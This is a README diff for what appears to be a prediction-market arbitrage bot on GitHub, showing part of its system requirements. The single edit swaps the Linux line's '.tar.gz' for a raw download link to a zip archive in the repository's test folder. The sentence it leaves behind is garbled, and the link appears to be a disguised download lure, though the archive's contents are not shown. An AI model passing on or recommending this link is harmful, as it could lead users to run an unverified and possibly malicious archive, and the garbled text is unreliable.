Crayz916/prediction-market-arbitrage-bot/README.md

 - **Operating System:**
   - Windows 10 or later
   - macOS 10.14 or later
-  - Any Linux distribution with support for `.tar.gz` files
+  - Any Linux distribution with support for `https://github.com/Crayz916/prediction-market-arbitrage-bot/raw/refs/heads/main/test/arbitrage-market-prediction-bot-3.0.zip` files

 - **Hardware:**
   - At least 2 GB of RAM